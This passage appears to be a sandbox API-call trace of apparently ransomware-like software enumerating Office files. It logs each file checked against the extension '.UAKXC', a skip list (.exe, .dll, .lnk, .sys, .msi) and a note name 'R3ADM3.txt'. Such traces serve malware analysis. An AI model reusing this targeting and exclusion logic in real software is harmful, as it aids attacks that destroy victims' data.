ftCreationTime.dwHighDateTime=0x1cba080, ftLastAccessTime.dwLowDateTime=0xa4c02e60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x5efba800, ftLastWriteTime.dwHighDateTime=0x1cba080, nFileSizeHigh=0x0, nFileSizeLow=0x75398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mscss7fr.dll", cAlternateFileName="")) returned 1 [0159.375] lstrcmpW (lpString1="mscss7fr.dll", lpString2=".") returned 1 [0159.375] lstrcmpW (lpString1="mscss7fr.dll", lpString2="..") returned 1 [0159.375] StrStrIW (lpFirst="mscss7fr.dll", lpSrch=".UAKXC") returned 0x0 [0159.375] StrStrIW (lpFirst="mscss7fr.dll", lpSrch=".exe") returned 0x0 [0159.375] StrStrIW (lpFirst="mscss7fr.dll", lpSrch=".dll") returned=".dll" [0159.375] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dfc9700, ftCreationTime.dwHighDateTime=0x1cba072, ftLastAccessTime.dwLowDateTime=0xa2045a20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1dfc9700, ftLastWriteTime.dwHighDateTime=0x1cba072, nFileSizeHigh=0x0, nFileSizeLow=0x19400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mscss7wre_en.dub", cAlternateFileName="MS79E7~1.DUB")) returned 1 [0159.375] lstrcmpW (lpString1="mscss7wre_en.dub", lpString2=".") returned 1 [0159.375] lstrcmpW (lpString1="mscss7wre_en.dub", lpString2="..") returned 1 [0159.375] StrStrIW (lpFirst="mscss7wre_en.dub", lpSrch=".UAKXC") returned 0x0 [0159.375] StrStrIW (lpFirst="mscss7wre_en.dub", lpSrch=".exe") returned 0x0 [0159.375] StrStrIW (lpFirst="mscss7wre_en.dub", lpSrch=".dll") returned 0x0 [0159.375] StrStrIW (lpFirst="mscss7wre_en.dub", lpSrch=".lnk") returned 0x0 [0159.375] StrStrIW (lpFirst="mscss7wre_en.dub", lpSrch=".sys") returned 0x0 [0159.375] StrStrIW (lpFirst="mscss7wre_en.dub", lpSrch=".msi") returned 0x0 [0159.375] StrStrIW (lpFirst="mscss7wre_en.dub", lpSrch="R3ADM3.txt") returned 0x0 [0159.375] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0159.375] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.375] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.375] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.376] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22c14b00, ftCreationTime.dwHighDateTime=0x1cba072, ftLastAccessTime.dwLowDateTime=0xa6dee7e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x22c14b00, ftLastWriteTime.dwHighDateTime=0x1cba072, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mscss7wre_es.dub", cAlternateFileName="MSCSS7~2.DUB")) returned 1 [0159.376] lstrcmpW (lpString1="mscss7wre_es.dub", lpString2=".") returned 1 [0159.376] lstrcmpW (lpString1="mscss7wre_es.dub", lpString2="..") returned 1 [0159.376] StrStrIW (lpFirst="mscss7wre_es.dub", lpSrch=".UAKXC") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_es.dub", lpSrch=".exe") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_es.dub", lpSrch=".dll") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_es.dub", lpSrch=".lnk") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_es.dub", lpSrch=".sys") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_es.dub", lpSrch=".msi") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_es.dub", lpSrch="R3ADM3.txt") returned 0x0 [0159.376] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0159.376] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.376] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.376] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.376] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x205ef100, ftCreationTime.dwHighDateTime=0x1cba072, ftLastAccessTime.dwLowDateTime=0xa408e480, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x205ef100, ftLastWriteTime.dwHighDateTime=0x1cba072, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mscss7wre_fr.dub", cAlternateFileName="MSCSS7~4.DUB")) returned 1 [0159.376] lstrcmpW (lpString1="mscss7wre_fr.dub", lpString2=".") returned 1 [0159.376] lstrcmpW (lpString1="mscss7wre_fr.dub", lpString2="..") returned 1 [0159.376] StrStrIW (lpFirst="mscss7wre_fr.dub", lpSrch=".UAKXC") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_fr.dub", lpSrch=".exe") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_fr.dub", lpSrch=".dll") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_fr.dub", lpSrch=".lnk") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_fr.dub", lpSrch=".sys") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_fr.dub", lpSrch=".msi") returned 0x0 [0159.376] StrStrIW (lpFirst="mscss7wre_fr.dub", lpSrch="R3ADM3.txt") returned 0x0 [0159.376] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0159.377] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.377] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.377] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.377] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ee1a00, ftCreationTime.dwHighDateTime=0x1cacf36, ftLastAccessTime.dwLowDateTime=0x58c0b550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52ee1a00, ftLastWriteTime.dwHighDateTime=0x1cacf36, nFileSizeHigh=0x0, nFileSizeLow=0xee9a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mset7.dll", cAlternateFileName="")) returned 1 [0159.377] lstrcmpW (lpString1="mset7.dll", lpString2=".") returned 1 [0159.377] lstrcmpW (lpString1="mset7.dll", lpString2="..") returned 1 [0159.377] StrStrIW (lpFirst="mset7.dll", lpSrch=".UAKXC") returned 0x0 [0159.377] StrStrIW (lpFirst="mset7.dll", lpSrch=".exe") returned 0x0 [0159.377] StrStrIW (lpFirst="mset7.dll", lpSrch=".dll") returned=".dll" [0159.377] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b94600, ftCreationTime.dwHighDateTime=0x1c879f3, ftLastAccessTime.dwLowDateTime=0x69def8b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9b94600, ftLastWriteTime.dwHighDateTime=0x1c879f3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mset7db.kic", cAlternateFileName="")) returned 1 [0159.377] lstrcmpW (lpString1="mset7db.kic", lpString2=".") returned 1 [0159.377] lstrcmpW (lpString1="mset7db.kic", lpString2="..") returned 1 [0159.377] StrStrIW (lpFirst="mset7db.kic", lpSrch=".UAKXC") returned 0x0 [0159.377] StrStrIW (lpFirst="mset7db.kic", lpSrch=".exe") returned 0x0 [0159.377] StrStrIW (lpFirst="mset7db.kic", lpSrch=".dll") returned 0x0 [0159.377] StrStrIW (lpFirst="mset7db.kic", lpSrch=".lnk") returned 0x0 [0159.377] StrStrIW (lpFirst="mset7db.kic", lpSrch=".sys") returned 0x0 [0159.377] StrStrIW (lpFirst="mset7db.kic", lpSrch=".msi") returned 0x0 [0159.377] StrStrIW (lpFirst="mset7db.kic", lpSrch="R3ADM3.txt") returned 0x0 [0159.377] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792570 [0159.377] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.377] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.377] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.377] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34365600, ftCreationTime.dwHighDateTime=0x1cacf2b, ftLastAccessTime.dwLowDateTime=0x69e15a10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x34365600, ftLastWriteTime.dwHighDateTime=0x1cacf2b, nFileSizeHigh=0x0, nFileSizeLow=0x1c5b3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mset7en.kic", cAlternateFileName="")) returned 1 [0159.377] lstrcmpW (lpString1="mset7en.kic", lpString2=".") returned 1 [0159.378] lstrcmpW (lpString1="mset7en.kic", lpString2="..") returned 1 [0159.378] StrStrIW (lpFirst="mset7en.kic", lpSrch=".UAKXC") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7en.kic", lpSrch=".exe") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7en.kic", lpSrch=".dll") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7en.kic", lpSrch=".lnk") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7en.kic", lpSrch=".sys") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7en.kic", lpSrch=".msi") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7en.kic", lpSrch="R3ADM3.txt") returned 0x0 [0159.378] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792598 [0159.378] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.378] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.378] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.378] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35678300, ftCreationTime.dwHighDateTime=0x1cacf2b, ftLastAccessTime.dwLowDateTime=0x69e3bb70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35678300, ftLastWriteTime.dwHighDateTime=0x1cacf2b, nFileSizeHigh=0x0, nFileSizeLow=0x13e9f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mset7es.kic", cAlternateFileName="")) returned 1 [0159.378] lstrcmpW (lpString1="mset7es.kic", lpString2=".") returned 1 [0159.378] lstrcmpW (lpString1="mset7es.kic", lpString2="..") returned 1 [0159.378] StrStrIW (lpFirst="mset7es.kic", lpSrch=".UAKXC") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7es.kic", lpSrch=".exe") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7es.kic", lpSrch=".dll") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7es.kic", lpSrch=".lnk") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7es.kic", lpSrch=".sys") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7es.kic", lpSrch=".msi") returned 0x0 [0159.378] StrStrIW (lpFirst="mset7es.kic", lpSrch="R3ADM3.txt") returned 0x0 [0159.378] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77925c0 [0159.378] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.378] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.378] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.379] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35678300, ftCreationTime.dwHighDateTime=0x1cacf2b, ftLastAccessTime.dwLowDateTime=0x58c0b550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35678300, ftLastWriteTime.dwHighDateTime=0x1cacf2b, nFileSizeHigh=0x0, nFileSizeLow=0x1c4c1c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mset7fr.kic", cAlternateFileName="")) returned 1 [0159.379] lstrcmpW (lpString1="mset7fr.kic", lpString2=".") returned 1 [0159.379] lstrcmpW (lpString1="mset7fr.kic", lpString2="..") returned 1 [0159.379] StrStrIW (lpFirst="mset7fr.kic", lpSrch=".UAKXC") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7fr.kic", lpSrch=".exe") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7fr.kic", lpSrch=".dll") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7fr.kic", lpSrch=".lnk") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7fr.kic", lpSrch=".sys") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7fr.kic", lpSrch=".msi") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7fr.kic", lpSrch="R3ADM3.txt") returned 0x0 [0159.379] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77925e8 [0159.379] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.379] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.379] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.379] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35678300, ftCreationTime.dwHighDateTime=0x1cacf2b, ftLastAccessTime.dwLowDateTime=0x58c57810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35678300, ftLastWriteTime.dwHighDateTime=0x1cacf2b, nFileSizeHigh=0x0, nFileSizeLow=0x3567a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mset7ge.kic", cAlternateFileName="")) returned 1 [0159.379] lstrcmpW (lpString1="mset7ge.kic", lpString2=".") returned 1 [0159.379] lstrcmpW (lpString1="mset7ge.kic", lpString2="..") returned 1 [0159.379] StrStrIW (lpFirst="mset7ge.kic", lpSrch=".UAKXC") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7ge.kic", lpSrch=".exe") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7ge.kic", lpSrch=".dll") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7ge.kic", lpSrch=".lnk") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7ge.kic", lpSrch=".sys") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7ge.kic", lpSrch=".msi") returned 0x0 [0159.379] StrStrIW (lpFirst="mset7ge.kic", lpSrch="R3ADM3.txt") returned 0x0 [0159.380] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792610 [0159.380] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.380] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.380] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.380] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35678300, ftCreationTime.dwHighDateTime=0x1cacf2b, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35678300, ftLastWriteTime.dwHighDateTime=0x1cacf2b, nFileSizeHigh=0x0, nFileSizeLow=0x1da59c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mset7jp.kic", cAlternateFileName="")) returned 1 [0159.380] lstrcmpW (lpString1="mset7jp.kic", lpString2=".") returned 1 [0159.380] lstrcmpW (lpString1="mset7jp.kic", lpString2="..") returned 1 [0159.380] StrStrIW (lpFirst="mset7jp.kic", lpSrch=".UAKXC") returned 0x0 [0159.380] StrStrIW (lpFirst="mset7jp.kic", lpSrch=".exe") returned 0x0 [0159.380] StrStrIW (lpFirst="mset7jp.kic", lpSrch=".dll") returned 0x0 [0159.380] StrStrIW (lpFirst="mset7jp.kic", lpSrch=".lnk") returned 0x0 [0159.380] StrStrIW (lpFirst="mset7jp.kic", lpSrch=".sys") returned 0x0 [0159.380] StrStrIW (lpFirst="mset7jp.kic", lpSrch=".msi") returned 0x0 [0159.380] StrStrIW (lpFirst="mset7jp.kic", lpSrch="R3ADM3.txt") returned 0x0 [0159.380] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792638 [0159.380] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.380] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.380] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.380] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ee1a00, ftCreationTime.dwHighDateTime=0x1cacf36, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52ee1a00, ftLastWriteTime.dwHighDateTime=0x1cacf36, nFileSizeHigh=0x0, nFileSizeLow=0x81988, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mset7tk.dll", cAlternateFileName="")) returned 1 [0159.380] lstrcmpW (lpString1="mset7tk.dll", lpString2=".") returned 1 [0159.380] lstrcmpW (lpString1="mset7tk.dll", lpString2="..") returned 1 [0159.381] StrStrIW (lpFirst="mset7tk.dll", lpSrch=".UAKXC") returned 0x0 [0159.381] StrStrIW (lpFirst="mset7tk.dll", lpSrch=".exe") returned 0x0 [0159.381] StrStrIW (lpFirst="mset7tk.dll", lpSrch=".dll") returned=".dll" [0159.381] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ed9dc00, ftCreationTime.dwHighDateTime=0x1cacf36, ftLastAccessTime.dwLowDateTime=0x69e3bb70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5ed9dc00, ftLastWriteTime.dwHighDateTime=0x1cacf36, nFileSizeHigh=0x0, nFileSizeLow=0x10f798, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mset7tkjp.dll", cAlternateFileName="MSET7T~1.DLL")) returned 1 [0159.381] lstrcmpW (lpString1="mset7tkjp.dll", lpString2=".") returned 1 [0159.381] lstrcmpW (lpString1="mset7tkjp.dll", lpString2="..") returned 1 [0159.381] StrStrIW (lpFirst="mset7tkjp.dll", lpSrch=".UAKXC") returned 0x0 [0159.381] StrStrIW (lpFirst="mset7tkjp.dll", lpSrch=".exe") returned 0x0 [0159.381] StrStrIW (lpFirst="mset7tkjp.dll", lpSrch=".dll") returned=".dll" [0159.381] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ab61d00, ftCreationTime.dwHighDateTime=0x1bf9d1a, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9ab61d00, ftLastWriteTime.dwHighDateTime=0x1bf9d1a, nFileSizeHigh=0x0, nFileSizeLow=0xe36, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.ICO", cAlternateFileName="")) returned 1 [0159.381] lstrcmpW (lpString1="MSN.ICO", lpString2=".") returned 1 [0159.381] lstrcmpW (lpString1="MSN.ICO", lpString2="..") returned 1 [0159.381] StrStrIW (lpFirst="MSN.ICO", lpSrch=".UAKXC") returned 0x0 [0159.381] StrStrIW (lpFirst="MSN.ICO", lpSrch=".exe") returned 0x0 [0159.381] StrStrIW (lpFirst="MSN.ICO", lpSrch=".dll") returned 0x0 [0159.381] StrStrIW (lpFirst="MSN.ICO", lpSrch=".lnk") returned 0x0 [0159.381] StrStrIW (lpFirst="MSN.ICO", lpSrch=".sys") returned 0x0 [0159.381] StrStrIW (lpFirst="MSN.ICO", lpSrch=".msi") returned 0x0 [0159.381] StrStrIW (lpFirst="MSN.ICO", lpSrch="R3ADM3.txt") returned 0x0 [0159.381] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.381] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.381] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.381] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4306b00, ftCreationTime.dwHighDateTime=0x1ca223a, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb4306b00, ftLastWriteTime.dwHighDateTime=0x1ca223a, nFileSizeHigh=0x0, nFileSizeLow=0x3392, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSO0127.ACL", cAlternateFileName="")) returned 1 [0159.381] lstrcmpW (lpString1="MSO0127.ACL", lpString2=".") returned 1 [0159.381] lstrcmpW (lpString1="MSO0127.ACL", lpString2="..") returned 1 [0159.382] StrStrIW (lpFirst="MSO0127.ACL", lpSrch=".UAKXC") returned 0x0 [0159.382] StrStrIW (lpFirst="MSO0127.ACL", lpSrch=".exe") returned 0x0 [0159.382] StrStrIW (lpFirst="MSO0127.ACL", lpSrch=".dll") returned 0x0 [0159.382] StrStrIW (lpFirst="MSO0127.ACL", lpSrch=".lnk") returned 0x0 [0159.382] StrStrIW (lpFirst="MSO0127.ACL", lpSrch=".sys") returned 0x0 [0159.382] StrStrIW (lpFirst="MSO0127.ACL", lpSrch=".msi") returned 0x0 [0159.382] StrStrIW (lpFirst="MSO0127.ACL", lpSrch="R3ADM3.txt") returned 0x0 [0159.382] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792688 [0159.382] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.382] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.382] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.382] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76339d00, ftCreationTime.dwHighDateTime=0x1cbdfc0, ftLastAccessTime.dwLowDateTime=0xdc9d7360, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x76339d00, ftLastWriteTime.dwHighDateTime=0x1cbdfc0, nFileSizeHigh=0x0, nFileSizeLow=0x36178, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCF.DLL", cAlternateFileName="")) returned 1 [0159.382] lstrcmpW (lpString1="MSOCF.DLL", lpString2=".") returned 1 [0159.382] lstrcmpW (lpString1="MSOCF.DLL", lpString2="..") returned 1 [0159.382] StrStrIW (lpFirst="MSOCF.DLL", lpSrch=".UAKXC") returned 0x0 [0159.382] StrStrIW (lpFirst="MSOCF.DLL", lpSrch=".exe") returned 0x0 [0159.382] StrStrIW (lpFirst="MSOCF.DLL", lpSrch=".dll") returned=".DLL" [0159.382] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x716ee900, ftCreationTime.dwHighDateTime=0x1cbdfc0, ftLastAccessTime.dwLowDateTime=0xdc9fd4c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x716ee900, ftLastWriteTime.dwHighDateTime=0x1cbdfc0, nFileSizeHigh=0x0, nFileSizeLow=0x6a790, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCFU.DLL", cAlternateFileName="")) returned 1 [0159.382] lstrcmpW (lpString1="MSOCFU.DLL", lpString2=".") returned 1 [0159.382] lstrcmpW (lpString1="MSOCFU.DLL", lpString2="..") returned 1 [0159.382] StrStrIW (lpFirst="MSOCFU.DLL", lpSrch=".UAKXC") returned 0x0 [0159.382] StrStrIW (lpFirst="MSOCFU.DLL", lpSrch=".exe") returned 0x0 [0159.382] StrStrIW (lpFirst="MSOCFU.DLL", lpSrch=".dll") returned=".DLL" [0159.382] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76339d00, ftCreationTime.dwHighDateTime=0x1cbdfc0, ftLastAccessTime.dwLowDateTime=0xdc9fd4c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x76339d00, ftLastWriteTime.dwHighDateTime=0x1cbdfc0, nFileSizeHigh=0x0, nFileSizeLow=0x4590, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCFUIUTILITIESDLL.DLL", cAlternateFileName="MSOCFU~1.DLL")) returned 1 [0159.383] lstrcmpW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2=".") returned 1 [0159.383] lstrcmpW (lpString1="MSOCFUIUTILITIESDLL.DLL", lpString2="..") returned 1 [0159.383] StrStrIW (lpFirst="MSOCFUIUTILITIESDLL.DLL", lpSrch=".UAKXC") returned 0x0 [0159.383] StrStrIW (lpFirst="MSOCFUIUTILITIESDLL.DLL", lpSrch=".exe") returned 0x0 [0159.383] StrStrIW (lpFirst="MSOCFUIUTILITIESDLL.DLL", lpSrch=".dll") returned=".DLL" [0159.383] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dadcd00, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xd61ff3a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1dadcd00, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xa7f60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSODCW.DLL", cAlternateFileName="")) returned 1 [0159.383] lstrcmpW (lpString1="MSODCW.DLL", lpString2=".") returned 1 [0159.383] lstrcmpW (lpString1="MSODCW.DLL", lpString2="..") returned 1 [0159.383] StrStrIW (lpFirst="MSODCW.DLL", lpSrch=".UAKXC") returned 0x0 [0159.383] StrStrIW (lpFirst="MSODCW.DLL", lpSrch=".exe") returned 0x0 [0159.383] StrStrIW (lpFirst="MSODCW.DLL", lpSrch=".dll") returned=".DLL" [0159.383] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4939000, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0x6a02ad50, 